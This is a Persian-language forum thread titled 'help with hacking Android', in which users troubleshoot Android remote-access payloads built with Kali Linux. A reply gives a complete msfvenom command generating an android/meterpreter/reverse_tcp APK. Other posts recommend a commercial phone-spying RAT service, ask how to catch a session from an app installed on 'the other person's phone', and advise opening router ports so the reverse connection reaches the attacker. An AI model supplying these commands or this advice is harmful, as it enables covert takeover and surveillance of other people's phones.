رفتن به مطلب
انجمن تیم امنیتی گارد ایران

کمک جهت هک اندروید

arshiyaimani3

ارسال های توصیه شده

سلام دوستان عزیز من امروز کالی لینوکس رو ریختم و توی انجمن گشتم و اموزش هک اندروید رو دیدم و انجام دادم کالی من برنامه رو میسازه و بقیه مراحل رو به خوبی انجام میده ولی وقتی برنامه رو روی گوشیم میریزم برنامه باز نمیشه و کالی هم هیچ عکس العملی نشون نمیده خواهشا کمک کنید و بگید مشکل از کجاست 

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

سلام

این مشکل رو میده

عکس

http://uupload.ir/files/l4nr_problem.jpg

مشکلش چیه

خو از خودم میپرسیدی :)

تو ساخت پیلود مشکل داری

این کدو بزن

msfvenom -p android/meterpreter/reverse_tcp LHOST=ur ip LPORT=4444 R > /root/Desktop/504w.apk

لینک به دیدگاه

با سلام ب همگی دوستان آقایون چرا خودتونو خسته میکنید میتونید کار آسونی انجام بدیید خیلی خیلی آسون بدون هیچ سیستمی میتونی با گوشیم حلش کنید

من تنها اسم سایت ساز راتو میدم اگ مشکلی داشتین خصوصی بدین جوابتونو میدم چونکه حوصلم تاپیک بیخود رو نمیکشه

http://maxxspy.com

دنبال آموزشش بگردیید چجوری تو سایت اکانت و ... بسازید چون وقت نمیکنم خیلی بیام انجمن باز اگ مشکلی داشتین بگین تا کمکتون کنم

این رات خیلی خوبه خیلیا میگن راتم نیس حالاا یادم نرفته رو گوشی های روت شده جواب میده

موفق باشید

لینک به دیدگاه

دوستان من تازه واردم ببخشید اگ سئوالم یکم براتون خنده داره بعد که ما الان payload میسازیم و اپ روی گوشی طرف نصب میشه چطوری handlr بگیریم ؟

لینک به دیدگاه

من همین کار رو کردم اما  یهو 

hdn09nrcenpr7vz33yqx.png

یهو فایلد میشه 

q5xhnzd9ira5eh4sqyzt.png

امکانش هست یه فیلم کامل بگیرید یا با تیم ویور بیاید رو سیستمم ؟

ایدی تلگرامم alirezadii هست هزینه هم داشته باشه میدم مرسی

لینک به دیدگاه

• 2 ماه بعد...

من همین کار رو کردم اما  یهو 

hdn09nrcenpr7vz33yqx.png

یهو فایلد میشه 

q5xhnzd9ira5eh4sqyzt.png

ا

سلام واسه من همه چی اوکیه.وقتی که SHOW OPTIONS  که میزنم SET LHOSTایپی شو نشون نمیده واSET LPORTنشون میده راهنماییم میکنین دوستا ممنونتون میشم

لینک به دیدگاه

سلام دوستان عزیز من امروز کالی لینوکس رو ریختم و توی انجمن گشتم و اموزش هک اندروید رو دیدم و انجام دادم کالی من برنامه رو میسازه و بقیه مراحل رو به خوبی انجام میده ولی وقتی برنامه رو روی گوشیم میریزم برنامه باز نمیشه و کالی هم هیچ عکس العملی نشون نمیده خواهشا کمک کنید و بگید مشکل از کجاست 

اساتید خیلی حرفه ای هستن و من حق دخالت با حظور این دوستان رو ندارم اما حس میکنم به باز کردن پورت ها اشاره نشده اینجا!!

شما باید پورت کالی و مودمتون رو باز کنید تا اتصال بین 2 سیستم برقرار بشه!!!

البته این نکته  هم یکی از اساتید امروز به من گفت امیدوارو ناراحت نشن از اینکه حرفشون رو انتقال دادم...

لینک به دیدگاه

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

• اضافه کردن...